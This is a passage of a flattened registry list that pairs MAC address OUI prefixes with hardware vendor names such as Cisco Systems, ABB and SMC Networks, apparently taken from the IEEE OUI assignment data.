Inc. 000CDD AOS technologies AG 000CCD IEC - TC57 000CA5 Naman NZ LTd 000CA9 Ebtron Inc. 000C20 Fi WIn, Inc. 000C1F Glimmerglass Networks 000C15 CyberPower Systems, Inc. 000C5D CHIC TECHNOLOGY (CHINA) CORP. 000C4F UDTech Japan Corporation 000C62 ABB AB, Cewe-Control 000C4C Arcor AG&Co. 000C47 SK Teletech(R&D Planning Team) 000BDA EyeCross Co.,Inc. 000BD6 Paxton Access Ltd 000BD0 XiMeta Technology Americas Inc. 000C16 Concorde Microsystems Inc. 000C09 Hitachi IE Systems Co., Ltd 000BEC NIPPON ELECTRIC INSTRUMENT, INC. 000BE7 COMFLUX TECHNOLOGY INC. 000BD4 Beijing Wise Technology & Science Development Co.Ltd 000BC5 SMC Networks, Inc. 000BC6 ISAC, Inc. 000C3F Cogent Defence & Security Networks, 000C30 Cisco Systems, Inc 000C02 ABB Oy 000BFF Berkeley Camera Engineering 000B73 Kodeos Communications 000B76 ET&T Technology Co. Ltd. 000B5E Audio Engineering Society Inc. 000B5F Cisco Systems, Inc 000B60 Cisco Systems, Inc 000B65 Sy.A.C. srl 000B61 Friedrich Lütze GmbH & Co. KG 000B89 Top Global Technology, Ltd. 000B8B KERAJET, S.A. 000B7E SAGINOMIYA Seisakusho Inc. 000B80 Lycium Networks 000B20 Hirata corporation 000B22 Environmental Systems and Services 000B1B Systronix, Inc. 000BA7 Maranti Networks 000BAA Aiphone co.,Ltd 000BA4 Shiron Satellite Communications Ltd. (1996) 000B99 SensAble Technologies, Inc. 000B9C TriBeam Technologies, Inc. 000B39 Keisoku Giken Co.,Ltd. 000B33 Vivato Technologies 000B3E BittWare, Inc 000B29 LS(LG) Industrial Systems co.,Ltd 000B59 ScriptPro, LLC 000B5C Newtech Co.,Ltd 000B5B Rincon Research Corporation 000B7C Telex Communications 000B83 DATAWATT B.V. 000B71 Litchfield Communications Inc. 000B74 Kingwave Technology Co., Ltd. 000BC1 Bay Microsystems, Inc. 000B41 Ing. Büro Dr. Beutlhauser 000B05 Pacific Broadband Networks 000B00 FUJIAN START COMPUTER EQUIPMENT CO.,LTD 000B03 Taekwang Industrial Co., Ltd 000AEA ADAM ELEKTRONIK LTD. ŞTI 000AE3 YANG MEI TECHNOLOGY CO., LTD 000ADC RuggedCom Inc. 000AE0 Fujitsu Softek 000AB7 Cisco Systems, Inc 000AB9 Astera Technologies Corp. 000AA1 V V S Limited 000AA4 SHANGHAI SURVEILLANCE TECHNOLOGY CO,LTD 000A9E BroadWeb Corportation 000B01 DAIICHI ELECTRONICS CO., LTD. 000AF6 Emerson Climate Technologies Retail Solutions, Inc. 000ABB Taiwan Secom Co,. Ltd 000AAD Stargames Corporation 000AB1 GENETEC Corporation 000A90 Bayside Interactive, Inc. 000A9D King Young Technology Co. Ltd. 000A8B Cisco Systems, Inc 000A88 InCypher S.A. 000B11 HIMEJI ABC TRADING CO.,LTD. 000A7C Tecton Ltd 000A6E Harmonic, Inc 000A6D EKS Elektronikservice GmbH 000A74 Manticom Networks Inc. 000A6F ZyFLEX Technologies Inc 0009DA Control Module Inc. 0009D7 DC Security Products 0009D8 Fält Communications AB 0009DB eSpace 0009D5 Signal Communication, Inc. 0009D3 Western DataCom Co., Inc. 000A21 Integra Telecom Co. Ltd 000A1E Red-M Products Limited 000A14 TECO a.s. 000A0B Sealevel Systems, Inc. 000A10 FAST media integrations AG 0009F7 SED, a division of Calian 0009E6 Cyber Switching Inc. 0009E2 Sinbon Electronics Co., Ltd. 000A35 Xilinx 000A3B GCT Semiconductor, Inc 000A33 Emulex Corporation 0009FB Philips Patient Monitoring 0009FD Ubinetics Limited 0009F9 ART JAPAN CO., LTD. 000A4B DataPower Technology, Inc. 000A43 Chunghwa Telecom Co., Ltd. 000A45 Audio-Technica Corp. 000A2E MAPLE NETWORKS CO., LTD 000A2D Cabot Communications Limited 000A25 CERAGON NETWORKS 000A63 DHD GmbH 000A67 OngCorp 000992 InterEpoch Technology,INC. 000995 Castle Technology Ltd 000998 Capinfo Company Limited 00098F Cetacean Networks 000987 NISHI NIPPON ELECTRIC WIRE & CABLE CO.,LTD. 000989 VividLogic Inc. 000986 Metalink LTD. 00098C Option Wireless Sweden 000985 Auto Telecom Company 00098D Velocity Semiconductor 000981 Newport Networks 000955 Young Generation International Corp. 00094A Homenet Communications 00094B FillFactory NV 00094D Braintree Communications Pty Ltd 000950 Independent Storage Corporation 000954 AMiT spol. s. r. o. 000952 Auerswald GmbH & Co. KG 000944 Cisco Systems, Inc 000962 Sonitor Technologies AS 00095D Dialogue Technology Corp. 00095C Philips Medical Systems - Cardiac and Monitoring Systems (CM 000958 INTELNET S.A. 0009B6 Cisco Systems, Inc 0009B3 MCM Systems Ltd 0009A3 Leadfly Techologies Corp. Ltd. 0009A5 HANSUNG ELETRONIC INDUSTRIES DEVELOPMENT CO., LTD 0009BC Utility, Inc 0009BE Mamiya-OP Co.,Ltd. 00099A ELMO COMPANY, LIMITED 00099C Naval Research Laboratory 000984 MyCasa Network Inc. 00092C Hitpoint Inc. 00092B iQstor Networks, Inc. 000926 YODA COMMUNICATIONS, INC. 000927 TOYOKEIKI CO.,LTD. 000923 Heaman System Co., Ltd 00091D Proteam Computer Corporation 0008B2 SHENZHEN COMPASS TECHNOLOGY DEVELOPMENT CO.,LTD 0008B1 ProQuent Systems 0008AF Novatec Corporation 0008A6 Multiware & Image Co., Ltd. 0008A3 Cisco Systems, Inc 00089E Beijing Enter-Net co.LTD 00090A SnedFar Technology Co., Ltd. 000903 Panasas, Inc 000907 Chrysalis Development 000906 Esteem Networks 0008FB SonoSite, Inc. 0008EE Logic Product Development 0008EB ROMWin Co.,Ltd. 0008E8 Excel Master Ltd. 0008DC Wiznet 0008D4 IneoQuest Technologies, Inc 0008D6 HASSNET Inc. 0008CE IPMobileNet Inc. 0008C2 Cisco Systems, Inc 0008C0 ASA SYSTEMS 0008B4 SYSPOL 0008B3 Fastwel 000917 WEM Technology Inc 000909 Telenor Connect A/S 0008DD Telena Communications, Inc. 0008E1 Barix AG 0008DA SofaWare Technologies Ltd. 00088E Nihon Computer Co., Ltd. 000881 DIGITAL HANDS CO.,LTD. 000882 SIGMA CORPORATION 000873 DapTechnology B.V. 00087A Wipotec GmbH 000871 NORTHDATA Co., Ltd. 00087E Bon Electro-Telecom Inc. 000880 BroadTel Canada Communications inc. 0007B9 Ginganet Corporation 00047F Chr. Mayr GmbH & Co. KG 00047B Schlumberger 00086D Missouri FreeNet 00086A Securiton Gmbh 000863 Entrisphere Inc. 000866 DSX Access Systems, Inc. 00085F Picanol N.V. 0007DD Cradle Technologies 0007D5 3e Technologies Int;., Inc. 0007DB Kirana Networks, Inc. 0007D1 Spectrum Signal Processing Inc. 00080C VDA Group S.p.a. 000804 ICA Inc. 0007FF Gluon Networks 0007F7 Galtronics 000829 TOKYO ELECTRON DEVICE NAGASAKI LIMITED 00081B Windigo Systems 0007EF Lockheed Martin Tactical Systems 0007F4 Eletex Co., Ltd. 000852 Davolink Co. Inc. 000857 Polaris Networks, Inc. 000751 m-u-t AG 000750 Cisco Systems, Inc 000742 Ormazabal 00074B Daihen Corporation 00074A Carl Valentin GmbH 00073C Telecom Design 00078B Wegener Communications, Inc. 000783 SynCom Network, Inc. 000787 Idea System Co., Ltd. 000789 Allradio Co., Ltd 000785 Cisco Systems, Inc 000736 Data Video Technologies Co., Ltd. 000738 Young Technology Co., Ltd. 000729 Kistler Instrumente AG 00072A Innovance Networks 000775 Valence Semiconductor, Inc. 00077F J Communications Co., Ltd. 000771 Embedded System Corporation 000770 Ubiquoss Inc 000764 YoungWoo Telecom Co. Ltd. 000710 Adax, Inc. 0006F8 The Boeing Company 0006FB Hitachi Printing Solutions, Ltd. 0006FC Fnet Co., Ltd. 0007B4 Cisco Systems, Inc 0007B3 Cisco Systems, Inc 0007B5 Any One Wireless Ltd. 0007A2 Opteon Corporation 000766 Chou Chin Industrial Co., Ltd. 000761 29530 000755 Lafon 000759 Boris Manufacturing Corp. 000719 Mobiis Co., Ltd. 00070D Cisco Systems, Inc 00070E Cisco Systems, Inc 00070B Novabase SGPS, SA 000793 Shin Satellite Public Company Limited 000796 LSI Systems, Inc. 0006B5 Source Photonics, Inc. 0006A5 PINON Corp. 00069D Petards Ltd 0006A8 KC Technology, Inc. 0006F4 Prime Electronics & Satellitics Inc. 0006EE Shenyang Neu-era Information & Technology Stock Co., Ltd 0006E8 Optical Network Testing, Inc. 0006BF Accella Technologies Co., Ltd. 0006BA Westwave Communications 0006BE Baumer Optronic GmbH 0006C4 Piolink Inc. 000666 Roving Networks 000667 Tripp Lite 000660 NADEX Co., Ltd. 00064E Broad Net Technology Inc. 0006DA ITRAN Communications Ltd. 0006D0 Elgar Electronics Corp. 0006CC JMI Electronics Co., Ltd. 0006E2 Ceemax Technology Co., Ltd. 0006E1 Techno Trade s.a 000677 SICK AG 000679 Konami Corporation 00066C Robinson Corporation 0006A0 Mx Imaging 000690 Euracom Communication GmbH 00067E WinCom Systems, Inc. 000624 Gentner Communications Corp. 000625 The Linksys Group, Inc. 000627 Uniwide Technologies, Inc. 00062C Bivio Networks 000621 Hinox, Co., Ltd. 00061C Hoshino Metal Industries, Ltd. 0005CE Prolink Microsystems Corporation 0005C2 Soronti, Inc. 00059D Daniel Computing Systems, Inc. 00063C Intrinsyc Software International Inc. 000630 Adtranz Sweden 000637 Toptrend-Meta Information (ShenZhen) Inc. 00062E Aristos Logic Corp. 0005E4 Red Lion Controls Inc. 0005F2 Power R, Inc. 0005F3 Webyn 000601 Otanikeiki Co., Ltd. 0005DF Electronic Innovation, Inc. 0005E0 Empirix Corp. 000623 MGE UPS Systems France 00060B Artesyn Embedded Technologies 000615 Kimoto Electric Co., Ltd. 00060A Blue2space 000605 Inncom International, Inc. 0005FA IPOptical, Inc. 0005E5 Renishaw PLC 0005F5 Geospace Technologies 0005FD PacketLight Networks Ltd. 00062D TouchStar Technologies, L.L.C. 000646 ShenZhen XunBao Network Technology Co Ltd 00064B Alexon Co., Ltd. 0005A4 Lucid Voice Ltd. 0005A5 KOTT 0005B3 Asahi-Engineering Co., Ltd. 0005A3 QEI, Inc. 00059E Zinwell Corporation 0005D8 Arescom, Inc. 0005DE Gi Fone Korea, Inc. 0005C4 Telect, Inc. 0005D4 FutureSmart Networks, Inc. 00056F Innomedia Technologies Pvt. Ltd. 000574 Cisco Systems, Inc 000567 Etymonic Design, Inc. 000565 Tailyn Communication Company Ltd. 000566 Secui.com Corporation 00056C Hung Chang Co., Ltd. 00055F Cisco Systems, Inc 00055D D-LINK SYSTEMS, INC. 000561 nac Image Technology, Inc. 000563 J-Works, Inc. 000557 Agile TV Corporation 00055B Charles Industries, Ltd. 000554 Rangestar Wireless 000553 DVC Company, Inc. 00054B Eaton Automation AG 00057C RCO Security AB 000583 ImageCom Limited 0004F6 Amphus 0004F4 Infinite Electronics Inc. 000536 Danam Communications, Inc. 000526 IPAS GmbH 000521 Control Microsystems 00051F Taijin Media Co., Ltd. 000523 AVL List GmbH 00050C Network Photonics, Inc. 000511 Complementary Technologies Ltd 000506 Reddo Networks AB 00050A ICS Spa 0004F1 WhereNet 0004EC Memobox SA 0004E4 Daeryung Ind., Inc. 0004E2 SMC Networks, Inc. 00058E Flextronics International GmbH & Co. Nfg. KG 000594 HMS Industrial Networks 000542 Otari, Inc. 000537 Nets Technology Co., Ltd. 000532 Cisco Systems, Inc 000429 Pixord Corporation 000426 Autosys 000421 Ocular Networks 000424 TMC s.r.l. 00041D Corega of America 00041A Ines Test and Measurement GmbH & CoKG 00041E Shikoku Instrumentation Co., Ltd. 000413 snom technology GmbH 000415 Rasteme Systems Co., Ltd. 000467 Wuhan Research Institute of MII 00045A The Linksys Group, Inc. 000463 Bosch Security Systems 00045C Mobiwave Pte Ltd 0004BF VersaLogic Corp. 0004C3 CASTOR Informatique 0004B1 Signal Technology, Inc. 0004B5 Equitrac Corporation 000441 Half Dome Systems, Inc. 00042F International Communications Products, Inc. 000451 Medrad, Inc. 000453 YottaYotta, Inc. 000450 DMD Computers SRL 000443 Agilent Technologies, Inc. 000449 Mapletree Networks 0004CB Tdsoft Communication, Ltd. 0004C8 LIBA Maschinenfabrik GmbH 0004CC Peek Traffic B.V. 000483 Deltron Technology, Inc. 000482 Medialogic Corp. 0004A5 Barco Projection Systems NV 0003C7 hopf Elektronik GmbH 0003C2 Solphone K.K. 0003C6 ICUE Systems, Inc. 0003BB Signal Communications Limited 0003BE Netility 0003E5 Hermstedt SG 0003E8 Wavesight Limited 0003DF Desana Systems 0003DA Takamisawa Cybernetics Co., Ltd. 0003D9 Secheron SA 0003B4 Macrotek International Corp. 0003A6 Traxit Technology, Inc. 0003A4 Imation Corp. 0003AB Bridge Information Systems 000397 FireBrick Limited 000398 WISI 00039E Tera System Co., Ltd. 000392 Hyundai Teletek Co., Ltd. 000395 California Amplifier 00038E Atoga Systems, Inc. 0003FB ENEGATE Co.,Ltd. 0003F6 Allegro Networks, Inc. 0003F3 Dazzle Multimedia, Inc. 0003EC ICG Research, Inc. 0003E9 Akara Canada, Inc. 00037C Coax Media 00037F Atheros Communications, Inc. 0002F0 AME Optimedia Technology Co., Ltd. 000368 Embedone Co., Ltd. 0003CA MTS Systems Corp. 0003CB SystemGear Co., Ltd. 000403 Nexsi Corporation 000406 Fa. Metabox AG 0003F8 SanCastle Technologies, Inc. 0003FA TiMetra Networks 00031A Beijing Broad Telecom Ltd., China 00035B BridgeWave Communications 000357 Intervoice-Brite, Inc. 0002A8 Air Link Technology 0002AB CTC Union Technologies Co., Ltd. 0002A4 AddPac Technology Co., Ltd. 0002A3 Hitachi Energy Switzerland Ltd 0002A0 Flatstack Ltd. 000294 Tokyo Sokushin Co., Ltd. 000296 Lectron Co,. Ltd. 0002B8 WHI KONSULT AB 0002BB Continuous Computing Corp 0002BC LVL 7 Systems, Inc. 0002A9 RACOM, s.r.o. 0002B2 Cablevision 0002B7 Watanabe Electric Industry Co., Ltd. 0002AF TeleCruz Technology, Inc. 000303 JAMA Electronics Co., Ltd. 000305 MSC Vertriebs GmbH 0002FE Viditec, Inc. 00019F ReadyNet 0002FF Handan BroadInfoCom 0002F5 VIVE Synergies, Inc. 000316 Nobell Communications, Inc. 00030F Digital China (Shanghai) Networks Ltd. 000311 Micro Technology Co., Ltd. 00030D Uniwill Computer Corp. 000309 Texcel Technology PLC 00028E Rapid 5 Networks, Inc. 00028A Ambit Microsystems Corporation 0001FA HOROSCAS 000282 ViaClix, Inc. 000285 Riverstone Networks 000327 HMS Industrial Networks 00032E Scope Information Management, Ltd. 000329 F3, Inc. 000321 Reco Research Co., Ltd. 0002D5 ACR 0002CE FoxJet, Inc. 0002C3 Arelnet Ltd. 0002C8 Technocom Communications Technology (pte) Ltd 000345 Routrek Networks Corporation 00033F BigBand Networks, Ltd. 0002E9 CS Systemes De Securite - C3S 0002E5 Timeware Ltd. 0002E0 ETAS GmbH 00026A Cocess Telecom Co., Ltd. 00026C Philips CFT 000262 Soyo Group Soyo Com Tech Co., Ltd 000265 Virditech Co. Ltd. 00025B Cambridge Silicon Radio 000256 Alpha Processor, Inc. 000259 Tsann Kuen China (Shanghai)Enterprise Co., Ltd. IT Group 000219 Paralon Technologies 000210 Fenecom 00020B Native Networks, Inc. 000218 Advanced Scientific Corp 0001E1 Kinpo Electronics, Inc. 0001DA WINCOMM Corporation 0001D2 inXtron, Inc. 0001C6 Quarry Technologies 0001FD Digital Voice Systems, Inc. 0001EE Comtrol Europe, Ltd. 0001F0 Tridium, Inc. 0001F1 Innovative Concepts, Inc. 0001E2 Ando Electric Corporation 0001D3 PAXCOMM, Inc. 00022F P-Cube, Ltd. 000227 ESD Electronic System Design GmbH 00021D Data General Communication Ltd. 000203 Woonsang Telecom, Inc. 0001F5 ERIM S.A. 0001FF Data Direct Networks, Inc. 0001FC Keyence Corporation 000279 Control Applications, Ltd. 00024F IPM Datacom S.R.L. 000251 Soma Networks, Inc. 00023C Creative Technology, Ltd. 00022C ABB Bomem, Inc. 000113 OLYMPUS CORPORATION 000108 AVLAB Technology, Inc. 000110 Gotham Networks 000112 Shark Multimedia Inc. 000116 Netspect Technologies, Inc. 0001A1 Mag-Tek, Inc. 000186 Uwe Disch 0001A6 Scientific-Atlanta Arcodan A/S 000172 TechnoLand Co., LTD. 00306C Hitex Holding GmbH 00308B Brix Networks 00016E Conklin Corporation 000174 CyberOptics Corporation 00015E BEST TECHNOLOGY CO., LTD. 000161 Meta Machine Technology 000155 Promise Technology, Inc. 000177 EDSL 00014D Shin Kin Enterprises Co., Ltd 00012E PC Partner Ltd. 00013E Ascom Tateco AB 000132 Dranetz - BMI 00013B BNA SYSTEMS 000134 Selectron Systems AG 000199 HeiSei Electronics 0001A0 Infinilink Corporation 000196 Cisco Systems, Inc 00017C AG-E GmbH 00019D E-Control Systems, Inc. 00018B NetLinks Co., Ltd. 00018D AudeSi Technologies 0001CE Custom Micro Products, Ltd. 0001BB Frequentis 0001BC Brains Corporation 0001C0 CompuLab, Ltd. 00011E Precidia Technologies, Inc. 00062B INTRASERVER TECHNOLOGY 000100 EQUIP'TRANS 00B09D Point Grey Research Inc. 00B06D Jones Futurex Inc. 00B094 Alaris, Inc. 0030F0 Uniform Industrial Corp. 0030EA TeraForce Technology Corporation 003069 IMPACCT TECHNOLOGY CORP. 0030C3 FLUECKIGER ELEKTRONIK AG 00305A TELGEN CORPORATION 003010 VISIONETICS INTERNATIONAL 003017 BlueArc UK Ltd 00309B Smartware 0030E5 Amper Datos S.A. 003045 Village Networks, Inc. (VNI) 003094 Cisco Systems, Inc 003040 Cisco Systems, Inc 0030F7 RAMIX INC. 0030D0 Tellabs 003014 DIVIO, INC. 00308A NICOTRA SISTEMI S.P.A 003072 Intellibyte Inc. 003006 SUPERPOWER COMPUTER 003038 XCP, INC. 003079 CQOS, INC. 00300C CONGRUENCY, LTD. 00304C APPIAN COMMUNICATIONS, INC. 003032 MagicRam, Inc. 0030E8 ENSIM CORP. 0030C9 LuxN, N 003028 FASE Saldatura srl 0030D9 DATACORE SOFTWARE CORP. 003026 HeiTel Digital Video GmbH 003077 ONPREM NETWORKS 003047 NISSEI ELECTRIC CO., LTD. 0030D4 AAE Systems, Inc. 00D0D7 B2C2, INC. 00D073 ACN ADVANCED COMMUNICATIONS 00D057 ULTRAK, INC. 00D0F0 CONVISION TECHNOLOGY GMBH 00D010 CONVERGENT NETWORKS, INC. 00D04B LA CIE GROUP S.A. 00D00E PLURIS, INC. 00D012 GATEWORKS CORP. 00D04D DIV OF RESEARCH & STATISTICS 00D02E COMMUNICATION AUTOMATION CORP. 00D017 SYNTECH INFORMATION CO., LTD. 00D036 TECHNOLOGY ATLANTA CORP. 00D0E3 ELE-CHEM ENGINEERING CO., LTD. 00D026 HIRSCHMANN AUSTRIA GMBH 00D045 KVASER AB 00D004 PENTACOM LTD. 00D005 ZHS ZEITMANAGEMENTSYSTEME 00D0D3 Cisco Systems, Inc 0030AB DELTA NETWORKS, INC. 003049 BRYANT TECHNOLOGY, LTD. 00306D LUCENT TECHNOLOGIES 00301C ALTVATER AIRDATA SYSTEMS 003080 Cisco Systems, Inc 003081 ALTOS C&C 00D0C4 TERATECH CORPORATION 00D061 TREMON ENTERPRISES CO., LTD. 00D0E5 SOLIDUM SYSTEMS CORP. 00D0C5 COMPUTATIONAL SYSTEMS, INC. 00D046 DOLBY LABORATORIES, INC. 00D0DE PHILIPS MULTIMEDIA NETWORK 00D00C SNIJDER MICRO SYSTEMS 00D0DA TAICOM DATA SYSTEMS CO., LTD. 00D03C Vieo, Inc. 00D0A7 TOKYO SOKKI KENKYUJO CO., LTD. 00D01E PINGTEL CORP. 00D014 ROOT, INC. 00D0CA Intrinsyc Software International Inc. 00D065 TOKO ELECTRIC 00D0AE ORESIS COMMUNICATIONS, INC. 00D0F2 MONTEREY NETWORKS 00D0A8 NETWORK ENGINES, INC. 00D0AB DELTAKABEL TELECOM CV 00504C Galil Motion Control 005076 IBM Corp 0050D4 JOOHONG INFORMATION & 0050A6 OPTRONICS 0050DB CONTEMPORARY CONTROL 00D0B4 KATSUJIMA CO., LTD. 00D086 FOVEON, INC. 00D0E8 MAC SYSTEM CO., LTD. 00D06B SR TELECOM INC. 00D0DC MODULAR MINING SYSTEMS, INC. 00507C VIDEOCON AG 005047 Private 005084 Quantum Corp. 0050A9 MOLDAT WIRELESS TECHNOLGIES 00509B SWITCHCORE AB 00D08A PHOTRON USA 00D06C SHAREWAVE, INC. 0050A7 Cisco Systems, Inc 00D0EE DICTAPHONE CORPORATION 00D023 INFORTREND TECHNOLOGY, INC. 00D0A2 INTEGRATED DEVICE 00D09A FILANET CORPORATION 00D01D FURUNO ELECTRIC CO., LTD. 00D034 ORMEC SYSTEMS CORP. 005052 TIARA NETWORKS, INC. 005064 CAE ELECTRONICS 005027 GENICOM CORPORATION 00505A NETWORK ALCHEMY, INC. 005039 MARINER NETWORKS 0050FD VISIONCOMM CO., LTD. 0050BF Metalligence Technology Corp. 005036 NETCAM, LTD. 005083 GILBARCO, INC. 0050DC TAS TELEFONBAU A. SCHWABE GMBH & CO. KG 005008 TIVA MICROCOMPUTER CORP. (TMC) 005095 PERACOM NETWORKS 00903D BIOPAC SYSTEMS, INC. 009057 AANetcom, Inc. 009083 TURBO COMMUNICATION, INC. 0090D7 NetBoost Corp. 0050CC Seagate Cloud Systems Inc 005016 Molex Canada Ltd 00507E NEWER TECHNOLOGY 005055 DOMS A/S 005072 CORVIS CORPORATION 0050CE LG INTERNATIONAL CORP. 0050F7 VENTURE MANUFACTURING (SINGAPORE) LTD. 005019 SPRING TIDE NETWORKS, INC. 00501B ABL CANADA, INC. 00501F MRG SYSTEMS, LTD. 005043 MARVELL SEMICONDUCTOR, INC. 0050FA OXTEL, LTD. 00901F ADTEC PRODUCTIONS, INC. 009038 FOUNTAIN TECHNOLOGIES, INC. 0090B0 VADEM 0050B8 INOVA COMPUTERS GMBH & CO. KG 00505B KAWASAKI LSI U.S.A., INC. 0090A8 NineTiles Networks, Ltd. 009015 CENTIGRAM COMMUNICATIONS CORP. 009095 UNIVERSAL AVIONICS 009041 APPLIED DIGITAL ACCESS 009024 PIPELINKS, INC. 00903A NIHON MEDIA TOOL INC. 0090B2 AVICI SYSTEMS INC. 0090B6 FIBEX SYSTEMS 009063 COHERENT COMMUNICATIONS SYSTEMS CORPORATION 0090EF INTEGRIX, INC. 0090C5 INTERNET MAGIC, INC. 00908C ETREND ELECTRONICS, INC. 009048 ZEAL CORPORATION 009007 DOMEX TECHNOLOGY CORP. 00902D DATA ELECTRONICS (AUST.) PTY, LTD. 0090D4 BindView Development Corp. 009011 WAVTrace, Inc. 009065 FINISAR CORPORATION 0010D3 GRIPS ELECTRONIC GMBH 0010FB ZIDA TECHNOLOGIES LIMITED 001053 COMPUTER TECHNOLOGY CORP. 009029 CRYPTO AG 00900B LANNER ELECTRONICS, INC. 009061 PACIFIC RESEARCH & ENGINEERING CORPORATION 0090CE avateramedical Mechatronics GmbH 00906E PRAXON, INC. 0090C0 K.J. LAW ENGINEERS, INC. 009062 ICP VORTEX COMPUTERSYSTEME GmbH 0090C3 TOPIC SEMICONDUCTOR CORP. 00905A DEARBORN GROUP, INC. 0090EC PYRESCOM 0090C4 JAVELIN SYSTEMS, INC. 0090B9 BERAN INSTRUMENTS LTD. 0090A5 SPECTRA LOGIC 0090A3 Corecess Inc. 009082 FORCE INSTITUTE 009000 DIAMOND MULTIMEDIA 009054 INNOVATIVE SEMICONDUCTORS, INC 0090DF MITSUBISHI CHEMICAL AMERICA, INC. 0090F6 ESCALATE NETWORKS, INC. 00103F TOLLGRADE COMMUNICATIONS, INC. 0010CD INTERFACE CONCEPT 001056 SODICK CO., LTD. 001061 HOSTLINK CORP. 001099 InnoMedia, Inc. 0010C8 COMMUNICATIONS ELECTRONICS SECURITY GROUP 001086 ATTO Technology, Inc. 0010F3 Nexcom International Co., Ltd. 0010DF RISE COMPUTER INC. 001072 GVN TECHNOLOGIES, INC. 001096 TRACEWELL SYSTEMS, INC. 001082 JNA TELECOMMUNICATIONS LIMITED 001098 STARNET TECHNOLOGIES, INC. 001068 COMOS TELECOM 001042 Alacritech, Inc. 0010E1 S.I. TECH, INC. 0010BB DATA & INFORMATION TECHNOLOGY 001020 Hand Held Products Inc 00107E BACHMANN ELECTRONIC GmbH 0010A0 INNOVEX TECHNOLOGIES, INC. 001016 T.SQWARE 001090 CIMETRICS, INC. 0010F5 AMHERST SYSTEMS, INC. 00103D PHASECOM, LTD. 0010EA ADEPT TECHNOLOGY 0010AE SHINKO ELECTRIC INDUSTRIES CO. 0010C4 MEDIA GLOBAL LINKS CO., LTD. 0010FE DIGITAL EQUIPMENT CORPORATION 0010AF TAC SYSTEMS, INC. 00108C Fujitsu Services Ltd 001058 ArrowPoint Communications 00100F INDUSTRIAL CPU SYSTEMS 0010F7 IRIICHI TECHNOLOGIES Inc. 0010ED SUNDANCE TECHNOLOGY, INC. 00109D CLARINET SYSTEMS, INC. 00100E MICRO LINEAR COPORATION 00102A ZF MICROSYSTEMS, INC. 0010E5 SOLECTRON TEXAS 00103A DIAMOND NETWORK TECH 001004 THE BRANTLEY COILE COMPANY,INC 0010EF DBTEL INCORPORATED 001076 EUREM GmbH 0010DA Kollmorgen Corp 0010E4 NSI CORPORATION 001088 AMERICAN NETWORKS INC. 001022 SatCom Media Corporation 00106C EDNT GmbH 0010E9 RAIDTEC LTD. 001003 IMATRON, INC. 001071 ADVANET INC. 0010BC Aastra Telecom 001049 ShoreTel, Inc 00105E Spirent plc, Service Assurance Broadband 0010AB KOITO ELECTRIC INDUSTRIES, LTD. 001010 INITIO CORPORATION 0010F2 ANTEC 00E007 Avaya ECS Ltd 0010BE MARCH NETWORKS CORPORATION 00E0BF TORRENT NETWORKING TECHNOLOGIES CORP. 00E0E3 SK-ELEKTRONIK GMBH 00E0C6 LINK2IT, L.L.C. 00E0E5 CINCO NETWORKS, INC. 00E061 EdgePoint Networks, Inc. 00E0B8 GATEWAY 2000 00E07C METTLER-TOLEDO, INC. 00E026 Redlake MASD LLC 00E020 TECNOMEN OY 00E0FB LEIGHTRONIX, INC. 00E053 CELLPORT LABS, INC. 00E0D3 DATENTECHNIK GmbH 00E043 VitalCom 00E0B3 EtherWAN Systems, Inc. 00E0ED SILICOM, LTD. 00E040 DeskStation Technology, Inc. 00E01A COMTEC SYSTEMS. CO., LTD. 00E081 TYAN COMPUTER CORP. 00E057 HAN MICROTELECOM. CO., LTD. 00E0BC SYMON COMMUNICATIONS, INC. 00E07E WALT DISNEY IMAGINEERING 00E00D RADIANT SYSTEMS 00E0DC NEXWARE CORP. 00E037 CENTURY CORPORATION 00E0C2 NECSY S.p.A. 00E09B ENGAGE NETWORKS, INC. 00E045 TOUCHWAVE, INC. 00E099 SAMSON AG 00E078 BERKELEY NETWORKS 00E087 LeCroy - Networking Productions Division 00E031 HAGIWARA ELECTRIC CO., LTD. 00E00B ROOFTOP COMMUNICATIONS CORP. 00E041 CSPI 00E0E2 INNOVA CORP. 00E082 ANERMA 00E077 WEBGEAR, INC. 00E056 HOLONTECH CORPORATION 006056 NETWORK TOOLS, INC. 00600C Eurotech Inc. 006032 I-CUBE, INC. 006033 ACUITY IMAGING, INC. 006013 NETSTAL MASCHINEN AG 006022 VICOM SYSTEMS, INC. 0060EE APOLLO 0060D8 ELMIC SYSTEMS, INC. 0060EF FLYTECH TECHNOLOGY CO., LTD. 00607B FORE SYSTEMS, INC. 00601C TELXON CORPORATION 000288 GLOBAL VILLAGE COMMUNICATION 006034 ROBERT BOSCH GmbH 006050 INTERNIX INC. 0060E0 AXIOM TECHNOLOGY CO., LTD. 006096 T.S. MICROTECH INC. 0060AE TRIO INFORMATION SYSTEMS AB 006053 TOYODA MACHINE WORKS, LTD. 0060C9 ControlNet, Inc. 006091 FIRST PACIFIC NETWORKS, INC. 00605F NIPPON UNISOFT CORPORATION 00601D LUCENT TECHNOLOGIES 006085 Storage Concepts 006011 CRYSTAL SEMICONDUCTOR CORP. 0060FA EDUCATIONAL TECHNOLOGY RESOURCES, INC. 0060DA Red Lion Controls, LP 00E0EC CELESTICA INC. 00E06C Ultra Electronics Command & Control Systems 00E02F MCNS HOLDINGS, L.P. 00E0B2 TELMAX COMMUNICATIONS CORP. 00E04A ZX Technologies, Inc 00E07A MIKRODIDAKT AB 00A063 JRL SYSTEMS, INC. 00A02C interWAVE Communications 00A0F7 V.I COMPUTER CORP. 00A090 TimeStep Corporation 00A037 Mindray DS USA, Inc. 00A04C INNOVATIVE SYSTEMS & TECHNOLOGIES, INC. 00A031 HAZELTINE CORPORATION, MS 1-17 00A041 INFICON 00A0E2 Keisokugiken Corporation 00A061 PURITAN BENNETT 00A03C EG&G NUCLEAR INSTRUMENTS 00A0C4 CRISTIE ELECTRONICS LTD. 00A071 VIDEO LOTTERY TECHNOLOGIES,INC 00A06D MANNESMANN TALLY CORPORATION 00A0F6 AutoGas Systems Inc. 00A0EA ETHERCOM CORP. 00A0DC O.N. ELECTRONIC CO., LTD. 00A00B COMPUTEX CO., LTD. 006043 iDirect, INC. 00603A QUICK CONTROLS LTD. 006028 MACROVISION CORPORATION 0060F0 JOHNSON & JOHNSON MEDICAL, INC 0060F5 ICON WEST, INC. 006000 XYCOM INC. 006045 PATHLIGHT TECHNOLOGIES 00A05D CS COMPUTER SYSTEME GmbH 00A033 imc MeBsysteme GmbH 00A0A9 NAVTEL COMMUNICATIONS INC. 006062 TELESYNC, INC. 0060E4 COMPUSERVE, INC. 00608F TEKRAM TECHNOLOGY CO., LTD. 0060C4 SOLITON SYSTEMS K.K. 006080 MICROTRONIX DATACOM LTD. 0060BE WEBTRONICS 0060BF 